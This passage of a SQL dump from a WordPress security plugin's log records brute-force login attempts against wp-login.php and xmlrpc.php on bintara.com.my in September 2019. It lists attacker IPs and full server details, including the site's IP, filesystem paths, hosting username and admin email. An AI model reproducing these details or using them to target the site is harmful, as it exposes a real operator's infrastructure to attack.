Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"42192\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGYmUQGijxhVPhG1M0MBAAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568774298.0576\";s:12:\"REQUEST_TIME\";s:10:\"1568774298\";}}','notice','2019-09-18 02:38:20','2019-09-18 02:38:18',18259672,19560104,'https://bintara.com.my/xmlrpc.php',1,0,'94.23.32.126'),(24858,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.218.64.212\";s:11:\"REMOTE_PORT\";s:5:\"34530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGZ9yqbKGlf1IVly7OTBwAAAUM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568774647.399\";s:12:\"REQUEST_TIME\";s:10:\"1568774647\";}}','notice','2019-09-18 02:44:08','2019-09-18 02:44:07',17741560,19233000,'https://bintara.com.my/wp-login.php',1,0,'162.218.64.212'),(24859,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.218.64.212\";s:11:\"REMOTE_PORT\";s:5:\"35652\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGZ@kQGijxhVPhG1M0MRAAAAAo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568774650.6855\";s:12:\"REQUEST_TIME\";s:10:\"1568774650\";}}','notice','2019-09-18 02:44:12','2019-09-18 02:44:11',18259560,19559440,'https://bintara.com.my/xmlrpc.php',1,0,'162.218.64.212'),(24860,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"35044\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGbpW4SfF9g@8lNlxwsIgAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568775078.0125\";s:12:\"REQUEST_TIME\";s:10:\"1568775078\";}}','notice','2019-09-18 02:51:19','2019-09-18 02:51:18',17741944,19232944,'https://bintara.com.my/wp-login.php',1,0,'138.68.136.152'),(24861,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"35626\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGbqW4SfF9g@8lNlxwsIwAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568775081.1989\";s:12:\"REQUEST_TIME\";s:10:\"1568775081\";}}','notice','2019-09-18 02:51:22','2019-09-18 02:51:21',18259368,19559264,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.136.152'),(24862,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"174.138.0.164\";s:11:\"REMOTE_PORT\";s:5:\"34064\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGb6kQGijxhVPhG1M0MpAAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568775146.633\";s:12:\"REQUEST_TIME\";s:10:\"1568775146\";}}','notice','2019-09-18 02:52:28','2019-09-18 02:52:27',17740432,19231840,'https://bintara.com.my/wp-login.php',1,0,'174.138.0.164'),(24863,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"174.138.0.164\";s:11:\"REMOTE_PORT\";s:5:\"34632\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGb7a1FqYKvioG46Y4Q5QAAAJU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568775149.9541\";s:12:\"REQUEST_TIME\";s:10:\"1568775149\";}}','notice','2019-09-18 02:52:31','2019-09-18 02:52:30',18260480,19560008,'https://bintara.com.my/xmlrpc.php',1,0,'174.138.0.164'),(24864,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.238.99.51\";s:11:\"REMOTE_PORT\";s:5:\"58396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGe5K1FqYKvioG46Y4TAgAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568775908.5333\";s:12:\"REQUEST_TIME\";s:10:\"1568775908\";}}','notice','2019-09-18 03:05:09','2019-09-18 03:05:08',17741336,19233960,'https://bintara.com.my/wp-login.php',1,0,'104.238.99.51'),(24865,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.238.99.51\";s:11:\"REMOTE_PORT\";s:5:\"58938\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGe561FqYKvioG46Y4TCAAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568775911.5571\";s:12:\"REQUEST_TIME\";s:10:\"1568775911\";}}','notice','2019-09-18 03:05:12','2019-09-18 03:05:11',18259616,19559960,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.99.51'),(24866,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 